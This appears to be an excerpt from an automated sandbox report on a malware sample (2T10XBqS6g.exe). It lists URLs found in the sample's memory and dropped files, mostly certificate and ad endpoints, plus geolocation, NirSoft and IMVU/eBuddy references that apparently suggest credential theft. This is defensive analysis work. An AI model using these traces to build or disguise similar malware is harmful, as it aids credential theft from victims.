              Source: 2T10XBqS6g.exe, 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000003.29760298435.0000000002918000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000003.29845147265.0000000002910000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl.globalsign.com/gsgccr3dvtlsca2020.crl0#
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
              Source: 2T10XBqS6g.exe, 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000003.29760298435.0000000002918000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000003.29845147265.0000000002910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl.godaddy.com/gdig2s1-2558.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertSHA2SecureServerCA.crl0=
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0F
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0D
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0L
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0L
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0L
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0L
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crls.pki.goog/gts1c3/fVJxbV-Ktmk.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
              Source: bhvF184.tmp.3.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
              Source: 2T10XBqS6g.exe, 00000002.00000002.30665347634.0000000002906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: 2T10XBqS6g.exe, 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30665347634.00000000028E3000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000003.29845147265.0000000002910000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30665347634.0000000002906000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: http://geoplugin.net/json.gp
              Source: 2T10XBqS6g.exe, 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000003.29845147265.0000000002910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp:0
              Source: 2T10XBqS6g.exe, 00000002.00000002.30665347634.0000000002906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpON
              Source: 2T10XBqS6g.exe, 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000003.29845147265.0000000002910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpR
              Source: 2T10XBqS6g.exe, 00000002.00000002.30665347634.0000000002888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp_c1628
              Source: 2T10XBqS6g.exe, 00000002.00000001.29605579234.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
              Source: 2T10XBqS6g.exe, Hovedrevisorat.bat.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhvF184.tmp.3.drString found in binary or memory: http://o.ss2.us/0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0B
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0F
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0G
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0K
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0M
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0O
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.globalsign.com/ca/gsovsha2g4r30
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr3dvtlsca20200V
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.godaddy.com/0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.godaddy.com/02
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.godaddy.com/05
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.pki.goog/gsr10)
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.pki.goog/gts1c301
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.pki.goog/gtsr100
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp.sectigo.com0%
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocsp2.globalsign.com/rootr30;
              Source: bhvF184.tmp.3.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: bhvF184.tmp.3.drString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
              Source: bhvF184.tmp.3.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0$
              Source: bhvF184.tmp.3.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der07
              Source: bhvF184.tmp.3.drString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
              Source: bhvF184.tmp.3.drString found in binary or memory: http://s.ss2.us/r.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr3dvtlsca2020.crt09
              Source: bhvF184.tmp.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gsovsha2g4r3.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
              Source: bhvF184.tmp.3.drString found in binary or memory: http://status.geotrust.com0=
              Source: bhvF184.tmp.3.drString found in binary or memory: http://status.thawte.com09
              Source: bhvF184.tmp.3.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://www.digicert.com/CPS0u
              Source: bhvF184.tmp.3.drString found in binary or memory: http://www.digicert.com/CPS0v
              Source: bhvF184.tmp.3.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: 2T10XBqS6g.exe, 2T10XBqS6g.exe, 00000005.00000002.29883097012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: 2T10XBqS6g.exe, 00000002.00000001.29605579234.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
              Source: 2T10XBqS6g.exe, 00000002.00000001.29605579234.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
              Source: 2T10XBqS6g.exe, 2T10XBqS6g.exe, 00000005.00000003.29882757737.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000005.00000003.29882687317.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000005.00000002.29883097012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: 2T10XBqS6g.exe, 00000005.00000002.29883025139.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/P
              Source: 2T10XBqS6g.exe, 00000005.00000003.29882757737.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000005.00000003.29882687317.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: 2T10XBqS6g.exe, 00000002.00000002.30678074728.0000000033A00000.00000040.10000000.00040000.00000000.sdmp, 2T10XBqS6g.exe, 00000005.00000002.29883097012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: 2T10XBqS6g.exe, 00000002.00000002.30678074728.0000000033A00000.00000040.10000000.00040000.00000000.sdmp, 2T10XBqS6g.exe, 00000005.00000002.29883097012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: 2T10XBqS6g.exe, 00000003.00000002.29913752802.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: 2T10XBqS6g.exe, 00000005.00000002.29883097012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: 2T10XBqS6g.exe, 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000003.29760298435.0000000002918000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000003.29845147265.0000000002910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
              Source: 2T10XBqS6g.exe, 00000002.00000001.29605579234.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
              Source: 2T10XBqS6g.exe, 00000002.00000001.29605579234.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
              Source: bhvF184.tmp.3.drString found in binary or memory: http://x.ss2.us/x.cer0&
              Source: 2T10XBqS6g.exe, 00000003.00000003.29905606658.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29907069083.0000000002311000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
              Source: 2T10XBqS6g.exe, 00000003.00000003.29906195815.000000000232D000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29907330745.000000000232D000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29907069083.0000000002311000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
              Source: 2T10XBqS6g.exe, 00000003.00000003.29905606658.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29907069083.0000000002311000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
              Source: bhvF184.tmp.3.drString found in binary or memory: https://99c8cba043b829a5adbf3c95c1c0a87a.azr.footprintdns.com/apc/trans.gif?b463cc9221b0d1cf6b255213
              Source: bhvF184.tmp.3.drString found in binary or memory: https://99c8cba043b829a5adbf3c95c1c0a87a.azr.footprintdns.com/apc/trans.gif?d61d17a32b075ad284d0798e
              Source: bhvF184.tmp.3.drString found in binary or memory: https://account.live.com/
              Source: bhvF184.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg
              Source: bhvF184.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_HFeToeM4u6fzMQF_f_rQ5Q
              Source: bhvF184.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_white_ufRYlllWOw4YyDRi
              Source: bhvF184.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svg
              Source: bhvF184.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/Microsoft_Logotype_Gray_X-qkgtg8KmnQEvm_9mDTcw2.svg
              Source: bhvF184.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/Microsoft_Logotype_White_4MYDQRab31HKDWWN-1HafA2.svg
              Source: bhvF184.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/favicon.ico
              Source: bhvF184.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
              Source: bhvF184.tmp.3.drString found in binary or memory: https://account.live.com/identity/confirm?mkt=EN-US&uiflavor=win10host&client_id=1E0000480728C5&conn
              Source: bhvF184.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/accountcorepackage_hSxsZy9Ymkhjr2rMMwej_g2.js?v=1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/bootstrapcomponentshim_yGKy8jAx8RL2bLqmBF063w2.js?v=1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/bootstrapshim_IX6xrWCoGcREOsbbsQ1Yvg2.js?v=1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/confirmidentity_9m6e3jBPkyZiRdJxglsYsA2.js?v=1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/converged_ux_v2_nBE5FSqn9KpH44ZlTc3VqQ2.css?v=1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/corewin10_Lmno_4TyJLm7Xee3gF3aOg2.js?v=1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/hostfooterpackage_FOuGbot8yZGKyYkh5yNQBA2.js?v=1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svg
              Source: bhvF184.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
              Source: bhvF184.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/oneds_MC5gQfpbTUjLu60sQCwU1w2.js?v=1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/wlivepackagefull_stPwvW3-5mShoxrbkAw2qw2.js?v=1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html
              Source: bhvF184.tmp.3.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: 2T10XBqS6g.exe, 00000003.00000003.29905606658.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29907069083.0000000002311000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
              Source: 2T10XBqS6g.exe, 00000003.00000003.29905606658.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29907069083.0000000002311000.00000004.00000020.00020000.00000000.sdmp, bhvF184.tmp.3.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
              Source: bhvF184.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhvF184.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhvF184.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhvF184.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhvF184.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE
              Source: bhvF184.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QUZE
              Source: bhvF184.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QWthbWFp
              Source: bhvF184.tmp.3.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?daed76fa672ed2fa739774d44bb38da5
              Source: bhvF184.tmp.3.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?e77f8dc2c88b806ec91fb50956aeee97
              Source: bhvF184.tmp.3.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhvF184.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729
              Source: bhvF184.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC05934b07a40a4d8a9a0cc7a79e85434
              Source: bhvF184.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2
              Source: bhvF184.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684
              Source: bhvF184.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144
              Source: bhvF184.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC9fc5c8b8bfb94ba5833ba8065b1de35
              Source: bhvF184.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCacc6c4ed30494f9fad065afe638a7ca
              Source: bhvF184.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480
              Source: bhvF184.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843
              Source: bhvF184.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894
              Source: bhvF184.tmp.3.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://btloader.com/tag?o=6208086025961472&upapi=true
              Source: bhvF184.tmp.3.drString found in binary or memory: https://capturemedia-assets.com/
              Source: bhvF184.tmp.3.drString found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
              Source: bhvF184.tmp.3.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://certs.godaddy.com/repository/0
              Source: bhvF184.tmp.3.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhvF184.tmp.3.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
              Source: bhvF184.tmp.3.drString found in binary or memory: https://contextual.media.net/
              Source: bhvF184.tmp.3.drString found in binary or memory: https://contextual.media.net/48/nrrV39259.js
              Source: bhvF184.tmp.3.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: bhvF184.tmp.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/active-view-scs-read-write-acl
              Source: bhvF184.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/ads-programmable
              Source: bhvF184.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/recaptcha/1
              Source: bhvF184.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl
              Source: bhvF184.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/ads-programmable
              Source: bhvF184.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/adspam-signals-scs
              Source: bhvF184.tmp.3.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/recaptcha
              Source: bhvF184.tmp.3.drString found in binary or memory: https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9
              Source: bhvF184.tmp.3.drString found in binary or memory: https://cvision.media.net/new/300x300/2/75/165/127/fefc2984-60ee-407b-a704-0db527f30f53.jpg?v=9
              Source: bhvF184.tmp.3.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
